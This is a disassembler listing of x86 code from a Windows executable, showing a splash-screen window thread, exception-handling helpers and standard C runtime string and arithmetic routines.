call ds:dword_511818 ; GetSystemMetrics
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
sub eax, [ebp+var_34]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
sub eax, [ebp+var_30]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_10], eax
mov eax, [ebp+var_14]
add eax, [ebp+var_34]
mov [ebp+var_C], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_30]
mov [ebp+var_8], eax
mov [ebp+var_58], 98800000h
push 0
push 0
push [ebp+var_58]
lea eax, [ebp+var_14]
push eax
call ds:dword_50E054 ; AdjustWindowRectEx
push 0
push 0
push 0
push 0
mov eax, [ebp+var_8]
sub eax, [ebp+var_10]
push eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_14]
push eax
push [ebp+var_10]
push [ebp+var_14]
push [ebp+var_58]
push offset dword_511918
push offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_51181C ; CreateWindowExA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ds:dword_515A54, eax
loc_4FC36B: ; CODE XREF: sub_4FC271+133�j
push 0
push 0
push [ebp+var_4]
lea eax, [ebp+var_54]
push eax
call ds:dword_511820 ; GetMessageA
test eax, eax
jz short loc_4FC3A6
mov eax, [ebp+var_54]
cmp eax, [ebp+var_4]
jnz short loc_4FC390
cmp [ebp+var_50], 0
jnz short loc_4FC390
jmp short loc_4FC3A6
; ---------------------------------------------------------------------------
loc_4FC390: ; CODE XREF: sub_4FC271+115�j
; sub_4FC271+11B�j
lea eax, [ebp+var_54]
push eax
call ds:dword_511824 ; TranslateMessage
lea eax, [ebp+var_54]
push eax
call ds:dword_511828 ; DispatchMessageA
jmp short loc_4FC36B
; ---------------------------------------------------------------------------
loc_4FC3A6: ; CODE XREF: sub_4FC271+10D�j
; sub_4FC271+11D�j
push 64h
call ds:dword_511794 ; Sleep
and [ebp+var_1C], 0
jmp short loc_4FC3BB
; ---------------------------------------------------------------------------
loc_4FC3B4: ; CODE XREF: sub_4FC271+170�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4FC3BB: ; CODE XREF: sub_4FC271+141�j
cmp [ebp+var_1C], 64h
jge short loc_4FC3E3
push 0
push offset sub_4FC216
call ds:dword_511830 ; EnumWindows
cmp ds:dword_515A54, 0
jnz short loc_4FC3D9
jmp short loc_4FC3E3
; ---------------------------------------------------------------------------
loc_4FC3D9: ; CODE XREF: sub_4FC271+164�j
push 64h
call ds:dword_511794 ; Sleep
jmp short loc_4FC3B4
; ---------------------------------------------------------------------------
loc_4FC3E3: ; CODE XREF: sub_4FC271+14E�j
; sub_4FC271+166�j
push [ebp+arg_0]
call ds:dword_511800 ; DeleteObject
xor eax, eax
pop edi
leave
retn 4
sub_4FC271 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC3F3 proc near ; CODE XREF: sub_504DC0+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push 0
lea eax, [ebp+var_4]
push eax
push 3
push 80000000h
push offset a_splashscreen_ ; "_splashscreen.bmp"
call sub_500346
test eax, eax
jz short locret_4FC450
push [ebp+var_4]
call sub_505456
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4FC446
push offset dword_515A58
push 0
push [ebp+var_8]
push offset sub_4FC271
push 0
push 0
call ds:dword_51183C ; CreateThread
push 64h
call ds:dword_511794 ; Sleep
loc_4FC446: ; CODE XREF: sub_4FC3F3+30�j
push 0
push [ebp+var_4]
call sub_500741
locret_4FC450: ; CODE XREF: sub_4FC3F3+1E�j
leave
retn
sub_4FC3F3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC454 proc near ; CODE XREF: sub_4FC54C+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4FC46C
push [ebp+arg_0]
call sub_4FCF68 ; RtlUnwind
loc_4FC46C: ; DATA XREF: sub_4FC454+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4FC454 endp
; =============== S U B R O U T I N E =======================================
sub_4FC474 proc near ; DATA XREF: sub_4FC496+A�o
; _5:004FC507�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4FC495
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4FC495: ; CODE XREF: sub_4FC474+10�j
retn
sub_4FC474 endp
; =============== S U B R O U T I N E =======================================
sub_4FC496 proc near ; CODE XREF: sub_4FC54C+67�p
; sub_4FC54C+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4FC474
push large dword ptr fs:0
mov large fs:0, esp
loc_4FC4B3: ; CODE XREF: sub_4FC496:loc_4FC4EE�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_4FC4F0
cmp esi, [esp+1Ch+arg_4]
jz short loc_4FC4F0
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_4FC4EE
push 101h
mov eax, [ebx+esi*4+8]
call sub_4FC52A
call dword ptr [ebx+esi*4+8]
loc_4FC4EE: ; CODE XREF: sub_4FC496+44�j
jmp short loc_4FC4B3
; ---------------------------------------------------------------------------
loc_4FC4F0: ; CODE XREF: sub_4FC496+2A�j
; sub_4FC496+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4FC496 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4FC474
jnz short locret_4FC520
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_4FC520
mov eax, 1
locret_4FC520: ; CODE XREF: _5:004FC50E�j _5:004FC519�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_511434
jmp short loc_4FC534
; =============== S U B R O U T I N E =======================================
sub_4FC52A proc near ; CODE XREF: sub_4FC496+4F�p
; sub_4FC54C+78�p
push ebx
push ecx
mov ebx, offset dword_511434
mov ecx, [ebp+8]
loc_4FC534: ; CODE XREF: _5:004FC528�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_4FC52A endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC54C proc near ; DATA XREF: sub_4FC000+A�o
; sub_4FCA80+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_4FC5EC
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4FC57F: ; CODE XREF: sub_4FC54C+90�j
cmp esi, 0FFFFFFFFh
jz short loc_4FC5E5
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_4FC5D3
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_4FC5D3
js short loc_4FC5DE
mov edi, [ebx+8]
push ebx
call sub_4FC454
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4FC496
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_4FC52A
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_4FC5D3: ; CODE XREF: sub_4FC54C+40�j
; sub_4FC54C+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4FC57F
; ---------------------------------------------------------------------------
loc_4FC5DE: ; CODE XREF: sub_4FC54C+54�j
mov eax, 0
jmp short loc_4FC601
; ---------------------------------------------------------------------------
loc_4FC5E5: ; CODE XREF: sub_4FC54C+36�j
mov eax, 1
jmp short loc_4FC601
; ---------------------------------------------------------------------------
loc_4FC5EC: ; CODE XREF: sub_4FC54C+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4FC496
add esp, 8
pop ebp
mov eax, 1
loc_4FC601: ; CODE XREF: sub_4FC54C+97�j
; sub_4FC54C+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4FC54C endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4FC496
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_4FC640
loc_4FC630: ; CODE XREF: sub_4FC640+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_4FC640
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4FC640 proc near ; CODE XREF: sub_4FF166+2A�p
; sub_508A16+AF�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 004FC630 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4FC66B
loc_4FC658: ; CODE XREF: sub_4FC640+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_4FC630
test cl, cl
jz short loc_4FC6B4
test edx, 3
jnz short loc_4FC658
loc_4FC66B: ; CODE XREF: sub_4FC640+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4FC676: ; CODE XREF: sub_4FC640+61�j
; sub_4FC640+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4FC6B8
and eax, 81010100h
jz short loc_4FC676
and eax, 1010100h
jnz short loc_4FC6B2
and esi, 80000000h
jnz short loc_4FC676
loc_4FC6B2: ; CODE XREF: sub_4FC640+68�j
; sub_4FC640+81�j ...
pop esi
pop edi
loc_4FC6B4: ; CODE XREF: sub_4FC640+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4FC6B8: ; CODE XREF: sub_4FC640+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_4FC6F5
test al, al
jz short loc_4FC6B2
cmp ah, bl
jz short loc_4FC6EE
test ah, ah
jz short loc_4FC6B2
shr eax, 10h
cmp al, bl
jz short loc_4FC6E7
test al, al
jz short loc_4FC6B2
cmp ah, bl
jz short loc_4FC6E0
test ah, ah
jz short loc_4FC6B2
jmp short loc_4FC676
; ---------------------------------------------------------------------------
loc_4FC6E0: ; CODE XREF: sub_4FC640+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4FC6E7: ; CODE XREF: sub_4FC640+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4FC6EE: ; CODE XREF: sub_4FC640+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4FC6F5: ; CODE XREF: sub_4FC640+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_4FC640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC700 proc near ; CODE XREF: sub_4FF252+FB�p
; sub_502DD0+161�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_4FC721
xor eax, eax
jmp short loc_4FC723
; ---------------------------------------------------------------------------
loc_4FC721: ; CODE XREF: sub_4FC700+1B�j
mov eax, edi
loc_4FC723: ; CODE XREF: sub_4FC700+1F�j
cld
pop edi
leave
retn
sub_4FC700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC730 proc near ; CODE XREF: sub_50153F+5E�p
; sub_50153F+1AB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_4FC761
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_4FC75F
jz short loc_4FC761
dec ecx
dec ecx
loc_4FC75F: ; CODE XREF: sub_4FC730+29�j
not ecx
loc_4FC761: ; CODE XREF: sub_4FC730+9�j
; sub_4FC730+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_4FC730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4FC770 proc near ; CODE XREF: sub_501CC4+1AF�p
; sub_501CC4+434�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_4FC7F3
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4FC794
shr ecx, 2
jnz short loc_4FC801
jmp short loc_4FC7B5
; ---------------------------------------------------------------------------
loc_4FC794: ; CODE XREF: sub_4FC770+1B�j
; sub_4FC770+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_4FC7C2
test al, al
jz short loc_4FC7CA
test esi, 3
jnz short loc_4FC794
mov ebx, ecx
shr ecx, 2
jnz short loc_4FC801
loc_4FC7B0: ; CODE XREF: sub_4FC770+8F�j
and ebx, 3
jz short loc_4FC7C2
loc_4FC7B5: ; CODE XREF: sub_4FC770+22�j
; sub_4FC770+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_4FC7EE
dec ebx
jnz short loc_4FC7B5
loc_4FC7C2: ; CODE XREF: sub_4FC770+2B�j
; sub_4FC770+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4FC7CA: ; CODE XREF: sub_4FC770+2F�j
test edi, 3
jz short loc_4FC7E4
loc_4FC7D2: ; CODE XREF: sub_4FC770+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4FC866
test edi, 3
jnz short loc_4FC7D2
loc_4FC7E4: ; CODE XREF: sub_4FC770+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4FC857
loc_4FC7EB: ; CODE XREF: sub_4FC770+7F�j
; sub_4FC770+F4�j
mov [edi], al
inc edi
loc_4FC7EE: ; CODE XREF: sub_4FC770+4D�j
dec ebx
jnz short loc_4FC7EB
pop ebx
pop esi
loc_4FC7F3: ; CODE XREF: sub_4FC770+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4FC7F9: ; CODE XREF: sub_4FC770+A9�j
; sub_4FC770+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4FC7B0
loc_4FC801: ; CODE XREF: sub_4FC770+20�j
; sub_4FC770+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4FC7F9
test dl, dl
jz short loc_4FC84B
test dh, dh
jz short loc_4FC841
test edx, 0FF0000h
jz short loc_4FC837
test edx, 0FF000000h
jnz short loc_4FC7F9
mov [edi], edx
jmp short loc_4FC84F
; ---------------------------------------------------------------------------
loc_4FC837: ; CODE XREF: sub_4FC770+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4FC84F
; ---------------------------------------------------------------------------
loc_4FC841: ; CODE XREF: sub_4FC770+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4FC84F
; ---------------------------------------------------------------------------
loc_4FC84B: ; CODE XREF: sub_4FC770+AD�j
xor edx, edx
mov [edi], edx
loc_4FC84F: ; CODE XREF: sub_4FC770+C5�j
; sub_4FC770+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4FC861
loc_4FC857: ; CODE XREF: sub_4FC770+79�j
xor eax, eax
loc_4FC859: ; CODE XREF: sub_4FC770+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4FC859
loc_4FC861: ; CODE XREF: sub_4FC770+E5�j
and ebx, 3
jnz short loc_4FC7EB
loc_4FC866: ; CODE XREF: sub_4FC770+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4FC770 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FC86E proc near ; CODE XREF: sub_4FC0D6+24�p
; sub_4FC0D6+2F�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_5160F4, 0
push ebx
push esi
push edi
jnz short loc_4FC89B
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4FC934
cmp eax, 5Ah
jg loc_4FC934
add eax, 20h
jmp loc_4FC934
; ---------------------------------------------------------------------------
loc_4FC89B: ; CODE XREF: sub_4FC86E+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_4FC8CF
cmp ds:dword_51165C, esi
jle short loc_4FC8BD
push esi
push ebx
call sub_4FCCCF
pop ecx
pop ecx
jmp short loc_4FC8C7
; ---------------------------------------------------------------------------
loc_4FC8BD: ; CODE XREF: sub_4FC86E+42�j
mov eax, ds:off_511450
mov al, [eax+ebx*2]
and eax, esi
loc_4FC8C7: ; CODE XREF: sub_4FC86E+4D�j
test eax, eax
jnz short loc_4FC8CF
loc_4FC8CB: ; CODE XREF: sub_4FC86E+AD�j
mov eax, ebx
jmp short loc_4FC934
; ---------------------------------------------------------------------------
loc_4FC8CF: ; CODE XREF: sub_4FC86E+3A�j
; sub_4FC86E+5B�j
mov edx, ds:off_511450
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4FC8F3
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_4FC8FC
; ---------------------------------------------------------------------------
loc_4FC8F3: ; CODE XREF: sub_4FC86E+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_4FC8FC: ; CODE XREF: sub_4FC86E+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_5160F4
call sub_4FCA80
add esp, 20h
test eax, eax
jz short loc_4FC8CB
cmp eax, esi
jnz short loc_4FC927
movzx eax, [ebp+var_4]
jmp short loc_4FC934
; ---------------------------------------------------------------------------
loc_4FC927: ; CODE XREF: sub_4FC86E+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4FC934: ; CODE XREF: sub_4FC86E+16�j
; sub_4FC86E+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4FC86E endp
; ---------------------------------------------------------------------------
align 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+14h]
or eax, eax
jge short loc_4FC961
inc edi
mov edx, [esp+10h]
neg eax
neg edx
sbb eax, 0
mov [esp+14h], eax
mov [esp+10h], edx
loc_4FC961: ; CODE XREF: _5:004FC94B�j
mov eax, [esp+1Ch]
or eax, eax
jge short loc_4FC97D
inc edi
mov edx, [esp+18h]
neg eax
neg edx
sbb eax, 0
mov [esp+1Ch], eax
mov [esp+18h], edx
loc_4FC97D: ; CODE XREF: _5:004FC967�j
or eax, eax
jnz short loc_4FC999
mov ecx, [esp+18h]
mov eax, [esp+14h]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+10h]
div ecx
mov edx, ebx
jmp short loc_4FC9DA
; ---------------------------------------------------------------------------
loc_4FC999: ; CODE XREF: _5:004FC97F�j
mov ebx, eax
mov ecx, [esp+18h]
mov edx, [esp+14h]
mov eax, [esp+10h]
loc_4FC9A7: ; CODE XREF: _5:004FC9B1�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4FC9A7
div ecx
mov esi, eax
mul dword ptr [esp+1Ch]
mov ecx, eax
mov eax, [esp+18h]
mul esi
add edx, ecx
jb short loc_4FC9D5
cmp edx, [esp+14h]
ja short loc_4FC9D5
jb short loc_4FC9D6
cmp eax, [esp+10h]
jbe short loc_4FC9D6
loc_4FC9D5: ; CODE XREF: _5:004FC9C5�j _5:004FC9CB�j
dec esi
loc_4FC9D6: ; CODE XREF: _5:004FC9CD�j _5:004FC9D3�j
xor edx, edx
mov eax, esi
loc_4FC9DA: ; CODE XREF: _5:004FC997�j
dec edi
jnz short loc_4FC9E4
neg edx
neg eax
sbb edx, 0
loc_4FC9E4: ; CODE XREF: _5:004FC9DB�j
pop ebx
pop esi
pop edi
retn 10h
; =============== S U B R O U T I N E =======================================
sub_4FC9EA proc near ; CODE XREF: sub_4FCA75+4�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_4FC9F2: ; CODE XREF: sub_4FC9EA+34�j
cmp ds:dword_51165C, 1
jle short loc_4FCA0A
movzx eax, byte ptr [edi]
push 8
push eax
call sub_4FCCCF
pop ecx
pop ecx
jmp short loc_4FCA19
; ---------------------------------------------------------------------------
loc_4FCA0A: ; CODE XREF: sub_4FC9EA+F�j
movzx eax, byte ptr [edi]
mov ecx, ds:off_511450
mov al, [ecx+eax*2]
and eax, 8
loc_4FCA19: ; CODE XREF: sub_4FC9EA+1E�j
test eax, eax
jz short loc_4FCA20
inc edi
jmp short loc_4FC9F2
; ---------------------------------------------------------------------------
loc_4FCA20: ; CODE XREF: sub_4FC9EA+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_4FCA30
cmp esi, 2Bh
jnz short loc_4FCA34
loc_4FCA30: ; CODE XREF: sub_4FC9EA+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_4FCA34: ; CODE XREF: sub_4FC9EA+44�j
xor ebx, ebx
loc_4FCA36: ; CODE XREF: sub_4FC9EA+7B�j
cmp ds:dword_51165C, 1
jle short loc_4FCA4B
push 4
push esi
call sub_4FCCCF
pop ecx
pop ecx
jmp short loc_4FCA56
; ---------------------------------------------------------------------------
loc_4FCA4B: ; CODE XREF: sub_4FC9EA+53�j
mov eax, ds:off_511450
mov al, [eax+esi*2]
and eax, 4
loc_4FCA56: ; CODE XREF: sub_4FC9EA+5F�j
test eax, eax
jz short loc_4FCA67
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_4FCA36
; ---------------------------------------------------------------------------
loc_4FCA67: ; CODE XREF: sub_4FC9EA+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_4FCA70
neg eax
loc_4FCA70: ; CODE XREF: sub_4FC9EA+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4FC9EA endp
; =============== S U B R O U T I N E =======================================
sub_4FCA75 proc near ; CODE XREF: sub_50AD0C+5F�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4FC9EA
pop ecx
retn
sub_4FCA75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FCA80 proc near ; CODE XREF: sub_4FC86E+A3�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EB08
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_5160E8, edi
jnz short loc_4FCAF6
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_50EB00
mov esi, 100h
push esi
push edi
call ds:dword_50E034 ; LCMapStringW
test eax, eax
jz short loc_4FCAD4
mov ds:dword_5160E8, ebx
jmp short loc_4FCAF6
; ---------------------------------------------------------------------------
loc_4FCAD4: ; CODE XREF: sub_4FCA80+4A�j
push edi
push edi
push ebx
push offset dword_50EAFC
push esi
push edi
call ds:dword_50E038 ; LCMapStringA
test eax, eax
jz loc_4FCC0E
mov ds:dword_5160E8, 2
loc_4FCAF6: ; CODE XREF: sub_4FCA80+2E�j
; sub_4FCA80+52�j
cmp [ebp+arg_C], edi
jle short loc_4FCB0B
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4FCCA4
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_4FCB0B: ; CODE XREF: sub_4FCA80+79�j
mov eax, ds:dword_5160E8
cmp eax, 2
jnz short loc_4FCB32
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_50E038 ; LCMapStringA
jmp loc_4FCC10
; ---------------------------------------------------------------------------
loc_4FCB32: ; CODE XREF: sub_4FCA80+93�j
cmp eax, 1
jnz loc_4FCC0E
cmp [ebp+arg_18], edi
jnz short loc_4FCB48
mov eax, ds:dword_516104
mov [ebp+arg_18], eax
loc_4FCB48: ; CODE XREF: sub_4FCA80+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_50E044 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_4FCC0E
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4FCD90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4FCBA3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_4FCBA3: ; CODE XREF: sub_4FCA80+10E�j
cmp [ebp+var_24], edi
jz short loc_4FCC0E
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_50E044 ; MultiByteToWideChar
test eax, eax
jz short loc_4FCC0E
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_50E034 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_4FCC0E
test byte ptr [ebp+arg_4+1], 4
jz short loc_4FCC22
cmp [ebp+arg_14], edi
jz loc_4FCC9D
cmp esi, [ebp+arg_14]
jg short loc_4FCC0E
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_50E034 ; LCMapStringW
test eax, eax
jnz loc_4FCC9D
loc_4FCC0E: ; CODE XREF: sub_4FCA80+66�j
; sub_4FCA80+B5�j ...
xor eax, eax
loc_4FCC10: ; CODE XREF: sub_4FCA80+AD�j
; sub_4FCA80+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4FCC22: ; CODE XREF: sub_4FCA80+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4FCD90
mov [ebp+var_18], esp
